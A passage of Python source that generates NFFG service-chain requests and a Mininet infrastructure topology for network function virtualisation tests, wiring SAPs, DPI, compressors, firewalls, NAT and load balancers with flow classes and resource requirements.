comp = test.add_nf(id="comp", name="COMPRESSOR",
func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1,
storage=0)
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id=12,
flowclass='dl_dst=00:00:00:00:00:01')
test.add_sglink(dpi.add_port(2), comp.add_port(1), id=13)
test.add_sglink(comp.ports[1], decomp.add_port(1), id=14)
test.add_sglink(decomp.ports[1], sap1.ports[1], id=15)
test.add_sglink(sap2.add_port(1), webserver1.ports[0], id=21)
test.add_sglink(webserver1.ports[0], sap2.ports[1], id=22,
flowclass='dl_dst=00:00:00:00:00:02')
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12, 13, 14, 15))
# test.add_req(sap2.ports[1], sap2.ports[1], bandwidth=1, delay=100,
# sg_path=(21, 22, 14, 23))
return test
def generate_etsi_req4b2a ():
test = NFFG(id="ETSI-2sap-web-dpi-bridge-comp-decomp-onlysap1",
name="ETSI-2sap-web-dpi-bridge-comp-decomp-onlysap1")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
comp = test.add_nf(id="comp", name="COMPRESSOR",
func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1,
storage=0)
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
bridge = test.add_nf(id="dockernf", name="dockernf", func_type="bridge",
cpu=1, mem=1,
storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id=12,
flowclass='dl_dst=00:00:00:00:00:01')
test.add_sglink(dpi.add_port(2), bridge.add_port(1), id=13)
test.add_sglink(bridge.add_port(2), comp.add_port(1), id=14)
test.add_sglink(comp.ports[1], decomp.add_port(1), id=15)
test.add_sglink(decomp.ports[1], sap1.ports[1], id=16)
test.add_sglink(sap2.add_port(1), webserver1.ports[0], id=21)
test.add_sglink(webserver1.ports[0], sap2.ports[1], id=22,
flowclass='dl_dst=00:00:00:00:00:02')
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12, 13, 14, 15, 16))
# test.add_req(sap2.ports[1], sap2.ports[1], bandwidth=1, delay=100,
# sg_path=(21, 22, 14, 23))
return test
def generate_etsi_req4b2b ():
test = NFFG(id="ETSI-2sap-web-dpi-bridge+-comp-decomp-onlysap1",
name="ETSI-2sap-web-dpi-bridge+-comp-decomp-onlysap1")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
comp = test.add_nf(id="comp", name="COMPRESSOR",
func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1,
storage=0)
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
bridge = test.add_nf(id="dockernf", name="dockernf", func_type="bridge",
cpu=1, mem=1,
storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id=12,
flowclass='dl_dst=00:00:00:00:00:01')
test.add_sglink(dpi.add_port(2), bridge.add_port(1), id=13)
test.add_sglink(bridge.add_port(2), comp.add_port(1), id=14)
test.add_sglink(comp.ports[1], decomp.add_port(1), id=15)
test.add_sglink(decomp.ports[1], sap1.ports[1], id=16)
test.add_sglink(sap2.add_port(1), webserver1.ports[0], id=21)
test.add_sglink(webserver1.ports[0], sap2.ports[1], id=22,
flowclass='dl_dst=00:00:00:00:00:02')
test.add_sglink(bridge.add_port(3), sap2.ports[1], id=23)
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12, 13, 14, 15, 16))
# test.add_req(sap2.ports[1], sap2.ports[1], bandwidth=1, delay=100,
# sg_path=(21, 22, 14, 23))
return test
def generate_etsi_req4b2b_robot1 ():
test = NFFG(id="ETSI-2sap-web-dpi-bridge+-comp-decomp-onlysap1+robot1",
name="ETSI-2sap-web-dpi-bridge+-comp-decomp-onlysap1+robot1")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
comp = test.add_nf(id="comp", name="COMPRESSOR",
func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1,
storage=0)
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
bridge = test.add_nf(id="dockernf", name="dockernf", func_type="bridge",
cpu=1, mem=1,
storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id=12,
flowclass='dl_dst=00:00:00:00:00:01')
test.add_sglink(dpi.add_port(2), bridge.add_port(1), id=13)
test.add_sglink(bridge.add_port(2), comp.add_port(1), id=14)
test.add_sglink(comp.ports[1], decomp.add_port(1), id=15)
test.add_sglink(decomp.ports[1], sap1.ports[1], id=16)
test.add_sglink(sap2.add_port(1), webserver1.ports[0], id=21)
test.add_sglink(webserver1.ports[0], sap2.ports[1], id=22,
flowclass='dl_dst=00:00:00:00:00:02')
test.add_sglink(bridge.add_port(3), sap2.ports[1], id=23)
sap54 = test.add_sap(name="SAP54", id="SAP54")
balancer1 = test.add_nf(id="balance_server1", name="balance_server1",
func_type="balance_server", cpu=1, mem=1,
storage=0)
balancer2 = test.add_nf(id="balance_server2", name="balance_server2",
func_type="balance_server", cpu=1, mem=1,
storage=0)
splitter1 = test.add_nf(id="splitter", name="splitter", func_type="splitter",
cpu=1, mem=1, storage=0)
test.add_sglink(sap54.add_port(1), splitter1.add_port(1), id=31,
flowclass='dl_src=bc:ee:7b:e6:8c:07')
test.add_sglink(splitter1.add_port(2), balancer1.add_port(1), id=32)
test.add_sglink(splitter1.add_port(3), balancer2.add_port(1), id=33)
test.add_sglink(balancer1.ports[1], sap54.ports[1], id=34)
test.add_sglink(balancer2.ports[1], sap54.ports[1], id=35)
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12, 13, 14, 15, 16))
# test.add_req(sap2.ports[1], sap2.ports[1], bandwidth=1, delay=100,
# sg_path=(21, 22, 14, 23))
return test
# def generate_etsi_req4a ():
# test = NFFG(id="ETSI-1sap-web-dpi-bridge-comp-decomp",
# name="ETSI-1sap-web-dpi-bridge-comp-decomp")
# sap1 = test.add_sap(name="SAP1", id="sap1")
# comp = test.add_nf(id="comp", name="COMPRESSOR",
# func_type="headerCompressor",
# cpu=1, mem=1, storage=0)
# decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
# func_type="headerDecompressor", cpu=1, mem=1,
# storage=0)
# webserver1 = test.add_nf(id="webserver1", name="webserver1",
# func_type="webserver", cpu=1, mem=1, storage=0)
# dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
# storage=0)
# bridge = test.add_nf(id="dockernf", name="dockernf", func_type="bridge",
# cpu=1, mem=1,
# storage=0)
# test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
# test.add_sglink(webserver1.ports[0], dpi.add_port(1), id=12,
# flowclass='dl_dst=00:00:00:00:00:01')
# test.add_sglink(dpi.add_port(2), bridge.add_port(1), id=13)
# test.add_sglink(bridge.add_port(2), comp.add_port(1), id=14)
# test.add_sglink(comp.ports[1], decomp.add_port(1), id=15)
# test.add_sglink(decomp.ports[1], sap1.ports[1], id=16)
# test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
# sg_path=(11, 12, 13, 14, 15, 16))
# return test
# def generate_etsi_req4b ():
# test = NFFG(id="ETSI-2sap-web-dpi-bridge-comp-decomp",
# name="ETSI-2sap-web-dpi-bridge-comp-decomp")
# sap1 = test.add_sap(name="SAP1", id="sap1")
# sap2 = test.add_sap(name="SAP2", id="sap2")
# comp = test.add_nf(id="comp", name="COMPRESSOR",
# func_type="headerCompressor",
# cpu=1, mem=1, storage=0)
# decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
# func_type="headerDecompressor", cpu=1, mem=1,
# storage=0)
# webserver1 = test.add_nf(id="webserver1", name="webserver1",
# func_type="webserver", cpu=1, mem=1, storage=0)
# dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
# storage=0)
# bridge = test.add_nf(id="dockernf", name="dockernf", func_type="bridge",
# cpu=1, mem=1,
# storage=0)
# test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
# test.add_sglink(webserver1.ports[0], dpi.add_port(1), id=12,
# flowclass='dl_dst=00:00:00:00:00:01')
# test.add_sglink(dpi.add_port(2), bridge.add_port(1), id=13)
# test.add_sglink(bridge.add_port(2), comp.add_port(1), id=14)
# test.add_sglink(comp.ports[1], decomp.add_port(1), id=15)
# test.add_sglink(decomp.ports[1], sap1.ports[1], id=16)
# test.add_sglink(sap2.add_port(1), webserver1.ports[0], id=21)
# test.add_sglink(webserver1.ports[0], bridge.add_port(3), id=22,
# flowclass='dl_dst=00:00:00:00:00:02')
# test.add_sglink(bridge.add_port(4), sap2.ports[1], id=23)
# test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
# sg_path=(11, 12, 13, 14, 15, 16))
# test.add_req(sap2.ports[1], sap2.ports[1], bandwidth=1, delay=100,
# sg_path=(21, 22, 23))
# return test
def generate_etsi_req4a_robot1 ():
test = NFFG(id="ETSI-1sap-web-dpi-bridge-comp-decomp-rob1",
name="ETSI-1sap-web-dpi-bridge-comp-decomp-rob1")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap54 = test.add_sap(name="SAP54", id="SAP54")
comp = test.add_nf(id="comp", name="COMPRESSOR",
func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1,
storage=0)
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
bridge = test.add_nf(id="dockernf", name="dockernf", func_type="bridge",
cpu=1, mem=1,
storage=0)
balancer1 = test.add_nf(id="balance_server1", name="balance_server1",
func_type="balance_server", cpu=3, mem=1,
storage=0)
balancer2 = test.add_nf(id="balance_server2", name="balance_server2",
func_type="balance_server", cpu=3, mem=1,
storage=0)
splitter1 = test.add_nf(id="splitter", name="splitter", func_type="splitter",
cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id=12,
flowclass='dl_dst=00:00:00:00:00:01')
test.add_sglink(dpi.add_port(2), bridge.add_port(1), id=13)
test.add_sglink(bridge.add_port(2), comp.add_port(1), id=14)
test.add_sglink(comp.ports[1], decomp.add_port(1), id=15)
test.add_sglink(decomp.ports[1], sap1.ports[1], id=16)
test.add_sglink(sap54.add_port(1), splitter1.add_port(1), id=21,
flowclass='dl_src=bc:ee:7b:e6:8c:07')
test.add_sglink(splitter1.add_port(2), balancer1.add_port(1), id=22)
test.add_sglink(splitter1.add_port(3), balancer2.add_port(1), id=23)
test.add_sglink(balancer1.ports[1], sap54.ports[1], id=24)
test.add_sglink(balancer2.ports[1], sap54.ports[1], id=25)
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12, 13, 14, 15, 16))
test.add_req(sap54.ports[1], sap54.ports[1], bandwidth=1, delay=50,
sg_path=(21, 22, 24))
return test
def generate_etsi_req4a_robot12 ():
test = NFFG(id="ETSI-1sap-web-dpi-bridge-comp-decomp-rob12",
name="ETSI-1sap-web-dpi-bridge-comp-decomp-rob12")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap54 = test.add_sap(name="SAP54", id="SAP54")
comp = test.add_nf(id="comp", name="COMPRESSOR",
func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1,
storage=0)
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
bridge = test.add_nf(id="dockernf", name="dockernf", func_type="bridge",
cpu=1, mem=1,
storage=0)
balancer1 = test.add_nf(id="balance_server1", name="balance_server1",
func_type="balance_server", cpu=3, mem=1,
storage=0)
balancer2 = test.add_nf(id="balance_server2", name="balance_server2",
func_type="balance_server", cpu=3, mem=1,
storage=0)
splitter1 = test.add_nf(id="splitter", name="splitter", func_type="splitter",
cpu=1, mem=1, storage=0)
balancer3 = test.add_nf(id="balance_server3", name="balance_server3",
func_type="balance_server", cpu=1, mem=1,
storage=0)
balancer4 = test.add_nf(id="balance_server4", name="balance_server4",
func_type="balance_server", cpu=1, mem=1,
storage=0)
splitter2 = test.add_nf(id="splitter2", name="splitter2",
func_type="splitter",
cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id=12,
flowclass='dl_dst=00:00:00:00:00:01')
test.add_sglink(dpi.add_port(2), bridge.add_port(1), id=13)
test.add_sglink(bridge.add_port(2), comp.add_port(1), id=14)
test.add_sglink(comp.ports[1], decomp.add_port(1), id=15)
test.add_sglink(decomp.ports[1], sap1.ports[1], id=16)
test.add_sglink(sap54.add_port(1), splitter1.add_port(1), id=21,
flowclass='dl_src=bc:ee:7b:e6:8c:07')
test.add_sglink(splitter1.add_port(2), balancer1.add_port(1), id=22)
test.add_sglink(splitter1.add_port(3), balancer2.add_port(1), id=23)
test.add_sglink(balancer1.ports[1], sap54.ports[1], id=24)
test.add_sglink(balancer2.ports[1], sap54.ports[1], id=25)
test.add_sglink(sap54.ports[1], splitter2.add_port(1), id=31,
flowclass='dl_src=9c:5c:8e:af:2e:e0')
test.add_sglink(splitter2.add_port(2), balancer3.add_port(1), id=32)
test.add_sglink(splitter2.add_port(3), balancer4.add_port(1), id=33)
test.add_sglink(balancer3.ports[1], sap54.ports[1], id=34)
test.add_sglink(balancer4.ports[1], sap54.ports[1], id=35)
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12, 13, 14, 15, 16))
test.add_req(sap54.ports[1], sap54.ports[1], bandwidth=1, delay=50,
sg_path=(21, 22, 24))
return test
def generate_etsi_req_robot1 ():
test = NFFG(id="SG-robot1", name="SG-robot1")
sap54 = test.add_sap(name="SAP54", id="SAP54")
balancer1 = test.add_nf(id="balance_server1", name="balance_server1",
func_type="balance_server", cpu=3, mem=1,
storage=0)
balancer2 = test.add_nf(id="balance_server2", name="balance_server2",
func_type="balance_server", cpu=3, mem=1,
storage=0)
splitter1 = test.add_nf(id="splitter", name="splitter", func_type="splitter",
cpu=1, mem=1, storage=0)
test.add_sglink(sap54.add_port(1), splitter1.add_port(1), id=11,
flowclass='dl_src=bc:ee:7b:e6:8c:07')
test.add_sglink(splitter1.add_port(2), balancer1.add_port(1), id=12)
test.add_sglink(splitter1.add_port(3), balancer2.add_port(1), id=13)
test.add_sglink(balancer1.ports[1], sap54.ports[1], id=14)
test.add_sglink(balancer2.ports[1], sap54.ports[1], id=15)
test.add_req(sap54.ports[1], sap54.ports[1], bandwidth=1, delay=50,
sg_path=(11, 12, 14))
return test
def generate_etsi_req_robot1_simple ():
test = NFFG(id="SG-robot1-simple", name="SG-robot1-simple")
sap54 = test.add_sap(name="SAP54", id="SAP54")
balancer1 = test.add_nf(id="balance_server1", name="balance_server1",
func_type="balance_server", cpu=1, mem=1,
storage=0)
# balancer2 = test.add_nf(id="balance_server2", name="balance_server2",
# func_type="balance_server", cpu=3, mem=1,
# storage=0)
splitter1 = test.add_nf(id="splitter", name="splitter", func_type="splitter",
cpu=1, mem=1, storage=0)
test.add_sglink(sap54.add_port(1), splitter1.add_port(1), id=11,
flowclass='dl_src=bc:ee:7b:e6:8c:07')
test.add_sglink(splitter1.add_port(2), balancer1.add_port(1), id=12)
# test.add_sglink(splitter1.add_port(3), balancer2.add_port(1), id=13)
test.add_sglink(balancer1.ports[1], sap54.ports[1], id=14)
# test.add_sglink(balancer2.ports[1], sap54.ports[1], id=15)
test.add_req(sap54.ports[1], sap54.ports[1], bandwidth=1, delay=50,
sg_path=(11, 12))
return test
def generate_etsi_req_robot2 ():
test = NFFG(id="SG-robot2", name="SG-robot2")
sap54 = test.add_sap(name="SAP54", id="SAP54")
balancer3 = test.add_nf(id="balance_server3", name="balance_server3",
func_type="balance_server", cpu=1, mem=1,
storage=0)
balancer4 = test.add_nf(id="balance_server4", name="balance_server4",
func_type="balance_server", cpu=1, mem=1,
storage=0)
splitter2 = test.add_nf(id="splitter2", name="splitter2",
func_type="splitter",
cpu=1, mem=1, storage=0)
test.add_sglink(sap54.add_port(1), splitter2.add_port(1), id=21,
flowclass='dl_src=9c:5c:8e:af:2e:e0')
test.add_sglink(splitter2.add_port(2), balancer3.add_port(1), id=22)
test.add_sglink(splitter2.add_port(3), balancer4.add_port(1), id=23)
test.add_sglink(balancer3.ports[1], sap54.ports[1], id=24)
test.add_sglink(balancer4.ports[1], sap54.ports[1], id=25)
test.add_req(sap54.ports[1], sap54.ports[1], bandwidth=1, delay=50,
sg_path=(21, 22, 24))
return test
def generate_etsi_req_robot12 ():
test = NFFG(id="SG-robot12", name="SG-robot12")
sap54 = test.add_sap(name="SAP54", id="SAP54")
balancer1 = test.add_nf(id="balance_server1", name="balance_server1",
func_type="balance_server", cpu=1, mem=1,
storage=0)
balancer2 = test.add_nf(id="balance_server2", name="balance_server2",
func_type="balance_server", cpu=1, mem=1,
storage=0)
splitter1 = test.add_nf(id="splitter1", name="splitter1",
func_type="splitter",
cpu=1, mem=1, storage=0)
balancer3 = test.add_nf(id="balance_server3", name="balance_server3",
func_type="balance_server", cpu=1, mem=1,
storage=0)
balancer4 = test.add_nf(id="balance_server4", name="balance_server4",
func_type="balance_server", cpu=1, mem=1,
storage=0)
splitter2 = test.add_nf(id="splitter2", name="splitter2",
func_type="splitter",
cpu=1, mem=1, storage=0)
test.add_sglink(sap54.add_port(1), splitter1.add_port(1), id=11,
flowclass='dl_src=bc:ee:7b:e6:8c:07')
test.add_sglink(splitter1.add_port(2), balancer1.add_port(1), id=12)
test.add_sglink(splitter1.add_port(3), balancer2.add_port(1), id=13)
test.add_sglink(balancer1.ports[1], sap54.ports[1], id=14)
test.add_sglink(balancer2.ports[1], sap54.ports[1], id=15)
test.add_sglink(sap54.ports[1], splitter2.add_port(1), id=21,
flowclass='dl_src=9c:5c:8e:af:2e:e0')
test.add_sglink(splitter2.add_port(2), balancer3.add_port(1), id=22)
test.add_sglink(splitter2.add_port(3), balancer4.add_port(1), id=23)
test.add_sglink(balancer3.ports[1], sap54.ports[1], id=24)
test.add_sglink(balancer4.ports[1], sap54.ports[1], id=25)
test.add_req(sap54.ports[1], sap54.ports[1], bandwidth=1, delay=50,
sg_path=(11, 12, 14))
return test
def generate_mn_topo_etsi ():
# Create NFFG
nffg = NFFG(id="INTERNAL", name="Internal-Mininet-Topology-ETSI")
# Add environments
ee11 = nffg.add_infra(id="EE11", name="ee-infra-11", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
ee12 = nffg.add_infra(id="EE12", name="ee-infra-12", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=2, mem=2, storage=2,
delay=0.9, bandwidth=5000)
ee21 = nffg.add_infra(id="EE21", name="ee-infra-21", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
ee22 = nffg.add_infra(id="EE22", name="ee-infra-22", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=2, mem=2, storage=2,
delay=0.9, bandwidth=5000)
# Add supported types
ee11.add_supported_type(
('headerDecompressor', 'simpleForwarder'))
ee12.add_supported_type(
('headerDecompressor', 'simpleForwarder'))
ee21.add_supported_type(
('headerCompressor', 'simpleForwarder'))
ee22.add_supported_type(
('headerCompressor', 'simpleForwarder'))
# Add OVS switches
sw1 = nffg.add_infra(id="SW1", name="switch-1", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.2,
bandwidth=10000)
sw2 = nffg.add_infra(id="SW2", name="switch-2", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.2,
bandwidth=10000)
gw = nffg.add_infra(id="GW", name="gateway", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.1,
bandwidth=10000)
# Add SAPs
sap1 = nffg.add_sap(id="SAP1", name="SAP1")
sap2 = nffg.add_sap(id="SAP2", name="SAP2")
sap14 = nffg.add_sap(id="SAP14", name="SAP14")
sap14.domain = "eth0"
# Add links
link_res = {'delay': 1.5, 'bandwidth': 10}
nffg.add_link(sw1.add_port(1), sap1.add_port(1), id="mn-link-sw1-sap1",
**link_res)
nffg.add_link(sw1.add_port(2), ee11.add_port(1), id="mn-link-sw1-ee11",
**link_res)
nffg.add_link(sw1.add_port(3), ee12.add_port(1), id="mn-link-sw1-ee12",
**link_res)
nffg.add_link(sw2.add_port(1), sap2.add_port(1), id="mn-link-sw2-sap2",
**link_res)
nffg.add_link(sw2.add_port(2), ee21.add_port(1), id="mn-link-sw2-ee21",
**link_res)
nffg.add_link(sw2.add_port(3), ee22.add_port(1), id="mn-link-sw2-ee22",
**link_res)
nffg.add_link(sw1.add_port(4), sw2.add_port(4), id="mn-link-sw1-sw2",
**link_res)
nffg.add_link(sw2.add_port(5), gw.add_port(1), id="mn-link-sw2-gw",
**link_res)
nffg.add_link(gw.add_port(2), sap14.add_port(1), id="mn-link-gw-sap14",
**link_res)
# nffg.duplicate_static_links()
return nffg
def generate_sssa_req ():
nffg = NFFG(id="SSSAreq1", name="SSSA connectivity request SAP1<->2")
sap1 = nffg.add_sap(id="SAP1", name="SAP1")
sap2 = nffg.add_sap(id="SAP2", name="SAP2")
nffg.add_sglink(src_port=sap1.add_port("port-SAP1"),
dst_port=sap2.add_port("port-SAP2"))
nffg.add_sglink(src_port=sap2.ports["port-SAP2"],
dst_port=sap1.ports["port-SAP1"])
return nffg
def generate_sssa_req2 ():
nffg = NFFG(id="SSSAreq1", name="SSSA connectivity request SAP1<->2")
sap1 = nffg.add_sap(id="SAP1", name="SAP1")
sap2 = nffg.add_sap(id="SAP2", name="SAP2")
nffg.add_sglink(src_port=sap1.add_port("port-SAP1"),
dst_port=sap2.add_port("port-SAP2"),
id="sg1")
nffg.add_sglink(src_port=sap2.ports["port-SAP2"],
dst_port=sap1.ports["port-SAP1"],
id="sg2")
nffg.add_req(src_port=sap1.ports["port-SAP1"],
dst_port=sap2.ports["port-SAP2"],
sg_path=["sg1"],
delay=1.0,
bandwidth=1000)
nffg.add_req(src_port=sap2.ports["port-SAP2"],
dst_port=sap1.ports["port-SAP1"],
sg_path=["sg2"],
delay=1.0,
bandwidth=1000)
return nffg
def generate_ietf_req ():
nffg = NFFG(id="SG-etsi-req", name="SG-etsi-req")
sap84 = nffg.add_sap(id="SAP84", name="SAP84")
sap85 = nffg.add_sap(id="SAP85", name="SAP85")
l2fwd = nffg.add_nf(id="L2fwdVhost", name="L2fwdVhost",
func_type="L2fwdVhost", cpu=2, mem=4, storage=0)
l2fwd.add_metadata(name="bw_req", value=0)
l2fwd.add_metadata(name="delay_req", value=100)
l2fwd2 = nffg.add_nf(id="L2fwdVhost2", name="L2fwdVhost2",
func_type="L2fwdVhost2", cpu=2, mem=4, storage=0)
l2fwd2.add_metadata(name="bw_req", value=0)
l2fwd2.add_metadata(name="delay_req", value=100)
nfpa = nffg.add_nf(id="NfpaVhost", name="NfpaVhost", func_type="NfpaVhost",
cpu=2, mem=4, storage=0)
nfpa.add_metadata(name="bw_req", value=0)
nfpa.add_metadata(name="delay_req", value=100)
nfpa2 = nffg.add_nf(id="NfpaVhost2", name="NfpaVhost2",
func_type="NfpaVhost2",
cpu=2, mem=4, storage=0)
nfpa2.add_metadata(name="bw_req", value=0)
nfpa2.add_metadata(name="delay_req", value=100)
# l2fdw
nffg.add_sglink(src_port=sap84.add_port(2), dst_port=l2fwd.add_port(1),
id=11, flowclass="eth_type=2048,ip_proto=17,udp_dst=8900")
nffg.add_sglink(src_port=l2fwd.ports[1], dst_port=sap84.ports[2],
id=12)
# l2fdw2
nffg.add_sglink(src_port=sap84.add_port(2), dst_port=l2fwd2.add_port(2),
id=17, flowclass="eth_type=2048,ip_proto=17,udp_dst=8901")
nffg.add_sglink(src_port=l2fwd2.ports[2], dst_port=sap84.ports[2],
id=18)
# nfpa
nffg.add_sglink(src_port=sap85.add_port(2), dst_port=nfpa.add_port(1),
id=13, flowclass="eth_type=2048,ip_proto=17,udp_dst=8900")
nffg.add_sglink(src_port=nfpa.ports[1], dst_port=sap85.ports[2],
id=14)
# nfpa2
nffg.add_sglink(src_port=sap85.ports[2], dst_port=nfpa2.add_port(2),
id=15, flowclass="eth_type=2048,ip_proto=17,udp_dst=8901")
nffg.add_sglink(src_port=nfpa2.ports[2], dst_port=sap85.ports[2],
id=16)
return nffg
def generate_verification_req ():
nffg = NFFG(id="verification-2sap-web-fw-dpi-nat",
name="verification-2sap-web-fw-dpi-nat")
sap1 = nffg.add_sap(id="SAP1", name="SAP1")
sap1.add_port(1)
sap2 = nffg.add_sap(id="SAP2", name="SAP2")
sap2.add_port(1)
sap3 = nffg.add_sap(id="SAP3", name="SAP3")
sap3.add_port(1)
fw = nffg.add_nf(id="fw", name="FIREWALL", func_type="firewall",
cpu=1, mem=1, storage=0)
fw.add_port(1)
fw.add_port(2)
fw.add_metadata(name="nf_static_config",
value="ovs-ofctl add-flow fw in_port=2,actions=output:1;"
"ovs-ofctl add-flow fw in_port=1,dl_type=0x0800,"
"nw_proto=6,tp_src=80,actions=output:2")
ws1 = nffg.add_nf(id="webserver1", name="webserver1", func_type="webserver",
cpu=1, mem=1, storage=0)
ws1.add_port(1)
ws1.add_metadata(name="nf_static_config",
value="filter packets with 'sex'")
dpi = nffg.add_nf(id="dpi", name="DPI", func_type="dpi",
cpu=1, mem=1, storage=0)
dpi.add_port(1)
dpi.add_port(2)
dpi.add_metadata(name="nf_static_config", value="10.0.0.0/24 <-> 172.16.58.3/32")
nat = nffg.add_nf(id="nat", name="NAT", func_type="nat",
cpu=1, mem=1, storage=0)
nat.add_port(1)
nat.add_port(2)
nffg.add_sglink(id=11, src_port=sap1.ports[1], dst_port=nat.ports[1])
nffg.add_sglink(id=12, src_port=nat.ports[2], dst_port=fw.ports[2])
nffg.add_sglink(id=13, src_port=fw.ports[1], dst_port=ws1.ports[1])
nffg.add_sglink(id=14, src_port=ws1.ports[1], dst_port=fw.ports[1],
flowclass="dl_type=0x0800,nw_dst=172.16.58.3")
nffg.add_sglink(id=15, src_port=fw.ports[2], dst_port=nat.ports[2])
nffg.add_sglink(id=16, src_port=nat.ports[1], dst_port=sap1.ports[1],
flowclass="dl_type=0x0800,nw_dst=10.0.0.1")
nffg.add_sglink(id=21, src_port=sap2.ports[1], dst_port=nat.ports[1])
nffg.add_sglink(id=26, src_port=nat.ports[1], dst_port=dpi.ports[1],
flowclass="dl_type=0x0800,nw_dst=10.0.0.2")
nffg.add_sglink(id=27, src_port=dpi.ports[2], dst_port=sap2.ports[1])
nffg.add_sglink(id=31, src_port=sap3.ports[1], dst_port=ws1.ports[1])
nffg.add_sglink(id=32, src_port=ws1.ports[1], dst_port=sap3.ports[1],
flowclass="dl_type=0x0800,nw_dst=192.168.3.11")
nffg.add_req(src_port=sap1.ports[1],
dst_port=sap1.ports[1],
sg_path=[11, 12, 13, 14, 15, 16],
delay=100,
bandwidth=1)
nffg.add_req(src_port=sap2.ports[1],
dst_port=sap2.ports[1],
sg_path=[21, 12, 13, 14, 15, 26, 27],
delay=100,
bandwidth=1)
nffg.add_req(src_port=sap3.ports[1],
dst_port=sap3.ports[1],
sg_path=[31, 32],
delay=100,
bandwidth=1)
return nffg
if __name__ == "__main__":
# test_parse_load()
# test_NFFG()
# nffg = generate_mn_topo()
# nffg = generate_mn_test_req()
# nffg = generate_dynamic_fallback_nffg()
# nffg = generate_static_fallback_topo()
# nffg = generate_one_bisbis()
# nffg = gen()
# nffg = generate_sdn_topo2()
# nffg = generate_sdn_req()
# nffg = generate_os_req()
# nffg = generate_os_mn_req()
# nffg = generate_dov()
# nffg = generate_global_req()
# nffg = generate_ewsdn_req2()
